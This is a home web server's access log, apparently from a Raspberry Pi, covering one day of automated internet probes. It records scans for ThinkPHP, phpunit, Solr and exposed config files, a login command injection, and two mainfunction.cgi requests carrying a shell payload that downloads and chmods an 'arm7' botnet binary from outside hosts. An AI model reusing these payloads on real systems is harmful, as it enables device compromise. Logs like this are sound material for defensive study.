Sat May 16 06:25:08 MDT 2020
 06:25:08 up 81 days, 10:53,  1 user,  load average: 0.55, 0.30, 0.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 81days  1:32m  3.13s /usr/bin/lxsession -s LXDE-pi -e LXDE
188.162.40.103 - - [16/May/2020:12:27:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
188.162.40.103 - - [16/May/2020:12:27:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
188.162.40.103 - - [16/May/2020:12:27:34 +0000] "GET /ncsi.txt HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
188.162.40.103 - - [16/May/2020:12:28:17 +0000] "GET /HNAP1/ HTTP/1.1" 404 0 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
114.32.240.95 - - [16/May/2020:12:51:27 +0000] "GET / HTTP/1.1" 400 0 "" ""
51.211.170.98 - - [16/May/2020:13:16:01 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
51.211.170.98 - - [16/May/2020:13:16:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
172.104.108.109 - - [16/May/2020:13:16:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0"
103.138.13.43 - - [16/May/2020:13:21:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
68.111.206.148 - - [16/May/2020:13:40:29 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
68.111.206.148 - - [16/May/2020:13:40:29 +0000] "GET / HTTP/1.1" 200 25000 "" ""
197.155.64.126 - - [16/May/2020:15:12:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
123.21.241.172 - - [16/May/2020:15:40:06 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.121 - - [16/May/2020:16:07:08 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [16/May/2020:16:21:23 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [16/May/2020:16:21:24 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [16/May/2020:16:38:10 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.126.79.223 - - [16/May/2020:17:21:52 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
61.222.143.176 - - [16/May/2020:17:45:46 +0000] "GET / HTTP/1.1" 400 0 "" ""
45.87.146.170 - - [16/May/2020:19:11:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
51.15.149.118 - - [16/May/2020:19:34:18 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
113.162.146.2 - - [16/May/2020:20:00:50 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.121 - - [16/May/2020:20:28:45 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
177.68.1.243 - - [16/May/2020:21:05:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
83.211.213.239 - - [16/May/2020:21:38:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
46.101.171.183 - - [16/May/2020:21:57:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.234.218.174 - - [16/May/2020:22:20:48 +0000] "GET /.env HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:49 +0000] "GET /sftp-config.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:49 +0000] "GET /.ftpconfig HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:50 +0000] "GET /.remote-sync.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:50 +0000] "GET /.vscode/ftp-sync.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:50 +0000] "GET /.vscode/sftp.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:51 +0000] "GET /deployment-config.json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
185.234.218.174 - - [16/May/2020:22:20:51 +0000] "GET /ftpsync.settings HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
14.18.118.55 - - [16/May/2020:23:11:01 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
14.18.118.55 - - [16/May/2020:23:11:06 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:07 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:07 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:08 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:08 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:09 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:09 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:10 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
14.18.118.55 - - [16/May/2020:23:11:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
184.154.47.2 - - [16/May/2020:23:16:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 "
172.104.108.109 - - [16/May/2020:23:45:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0"
154.126.79.223 - - [17/May/2020:00:02:56 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
154.126.79.223 - - [17/May/2020:00:02:58 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
139.162.106.181 - - [17/May/2020:00:34:13 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)"
195.54.160.121 - - [17/May/2020:00:46:31 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:00:46:52 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:00:46:53 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:00:47:32 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:00:56:10 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:01:15:51 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.121 - - [17/May/2020:01:20:18 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
108.29.136.81 - - [17/May/2020:02:05:50 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
108.29.136.81 - - [17/May/2020:02:05:50 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
84.52.94.215 - - [17/May/2020:04:04:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
47.101.136.228 - - [17/May/2020:06:15:03 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
47.101.136.228 - - [17/May/2020:06:15:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
114.33.5.49 - - [17/May/2020:06:30:29 +0000] "GET / HTTP/1.1" 400 0 "" ""
59.126.176.55 - - [17/May/2020:07:06:53 +0000] "GET / HTTP/1.1" 400 0 "" ""
46.172.71.186 - - [17/May/2020:07:25:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
220.134.60.69 - - [17/May/2020:07:26:15 +0000] "GET / HTTP/1.1" 400 0 "" ""
223.71.167.165 - - [17/May/2020:07:32:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
187.190.246.249 - - [17/May/2020:08:14:02 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
187.190.246.249 - - [17/May/2020:08:14:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
186.5.75.243 - - [17/May/2020:08:34:31 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
186.5.75.243 - - [17/May/2020:08:34:31 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
65.49.27.166 - - [17/May/2020:09:01:25 +0000] "GET /phpmyadmin HTTP/1.1" 404 0 "" "python-requests/2.22.0"
143.255.198.242 - - [17/May/2020:09:08:06 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
143.255.198.242 - - [17/May/2020:09:08:06 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
203.176.132.114 - - [17/May/2020:09:47:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.171.56.250 - - [17/May/2020:10:29:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.75.222.26 - - [17/May/2020:11:13:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
98.254.118.133 - - [17/May/2020:11:38:09 +0000] "GET / HTTP/1.1" 400 0 "" ""
Sun May 17 06:25:07 MDT 2020
 06:25:07 up 82 days, 10:53,  1 user,  load average: 0.33, 0.36, 0.34
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 82days  1:33m  3.13s /usr/bin/lxsession -s LXDE-pi -e LXDE